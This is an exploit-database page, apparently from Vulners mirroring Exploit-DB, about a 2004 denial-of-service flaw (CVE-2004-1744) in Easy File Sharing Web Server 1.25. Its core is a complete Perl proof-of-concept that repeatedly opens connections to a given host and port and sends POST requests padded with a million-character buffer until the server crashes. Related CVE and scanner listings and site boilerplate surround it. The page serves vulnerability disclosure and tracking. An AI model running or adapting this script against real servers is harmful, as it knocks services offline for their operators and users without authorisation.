Lucene search
+L

Easy File Sharing Web Server 1.25 - Denial of Service

🗓️ 27 Aug 2004 00:00:00Reported by GulfTech SecurityType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 44 Views

Denial of Service vulnerability in Easy File Sharing Web Server 1.25 can crash the server.

Related
Code
ReporterTitlePublishedViews
Family
nessus
Tenable Nessus
Easy File Sharing Large HTTP Request Remote DoS
18 Aug 200400:00
nessus
cve
CVE
CVE-2004-1744
26 Feb 200505:00
cve
cvelist
Cvelist
CVE-2004-1744
26 Feb 200505:00
cvelist
euvd
EUVD
EUVD-2004-1738
7 Oct 202500:30
euvd
nvd
NVD
CVE-2004-1744
24 Aug 200404:00
nvd
#####################################################
# Easy File Sharing Webserver v1.25 Denial Of Service
# Proof Of Concept Code By GulfTech Security Research
#####################################################
# Easy File Sharing Webserver v1.25 will consume 99%
# of CPU usage until it crashes when sent large req's
#####################################################

use IO::Socket;

print "=====================================================n".
      " Easy File Sharing Webserver v1.25 Denial Of Service n".
  "=====================================================n";

unless (@ARGV > 1) { die("usage: efswsdos.pl host port"); }

my $remote_host = $ARGV[0];
my $remote_port = $ARGV[1];
my $done = "15121512";
my $buff = "A" x 1000000;
my $post = "POST /".$buff." HTTP/1.0 ".$done;

print "
DoS'ing Server $remote_host Press ctrl+c to stopn";

while ($post) {
for (my $i=1; $i<10; $i++) {
my $i = IO::Socket::INET->new( Proto => "tcp",
      PeerAddr   => $remote_host,
  PeerPort   => $remote_port,
      Timeout   => '10000',
      Type       => SOCK_STREAM,
      ) || die("
Server Is Dead!");

print $i $post;
$i->autoflush(1);
  }
}
close $i;

# milw0rm.com [2004-08-27]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Jan 2018 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.03726
44